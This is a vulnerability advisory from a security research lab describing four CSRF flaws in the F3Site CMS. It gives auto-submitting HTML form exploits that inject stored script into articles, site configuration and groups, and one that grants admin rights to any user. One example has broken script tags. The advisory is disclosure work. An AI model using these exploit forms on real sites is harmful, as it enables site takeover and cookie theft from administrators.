Discovered and Provided:High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in F3Site which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) vulnerabilities in F3Site
1.1 The vulnerability exists due to insufficient validation of the request origin in mod/edit/new.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify arbitrary article. Due to insufficient sanitation of input data in the "txt" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation examples:
<form action="http://host/edit/5/NEWSID?ref" method="post" name="main">
<input type="hidden" name="cat" value="1">
<input type="hidden" name="name" value="tt">
<input type="hidden" name="access" value="on">
<input type="hidden" name="img" value="">
<input type="hidden" name="br" value="on">
<input type="hidden" name="emo" value="on">
<input type="hidden" name="txt" value='text"><script>alert(document.cookie)</script>'>
<input type="hidden" name="text" value="">
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in admin/configMain.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify website configuration. Due to insufficient sanitation of input data in the "footer" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/admin/configMain" method="post" name="main">
<input type="hidden" name="lang" value="en">
<input type="hidden" name="skin" value="system">
<input type="hidden" name="title" value="Website title">
<input type="hidden" name="footer" value='text"><script>alert(document.cookie)</script>'>
<input type="hidden" name="metaDesc" value="">
</form>
<script>
document.main.submit();
</script>

1.3 The vulnerability exists due to insufficient validation of the request origin in admin/editGroup.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit groups. Due to insufficient sanitation of input data in the "dsc" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/admin/editGroup" method="post" name="main">
<input type="hidden" name="name" value="newgrp">
<input type="hidden" name="access" value="1">
<input type="hidden" name="opened" value="on">
<input type="hidden" name="dsc" value='dsc"><script>alert(document.cookie)</script>'>
</form>
<script>
do cument.main.submit();
< /script>

1.4 The vulnerability exists due to insufficient validation of the request origin in admin/editAdmin.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and assign administrative privileges to arbitrary user account.
Exploitation example:
<form action="http://host/admin/editAdmin/USER_ID" method="post" name="main">
<input type="hidden" name="lv" value="3">
<input type="hidden" name="+" value="on">
</form>
<script>
document.main.submit();
</script>
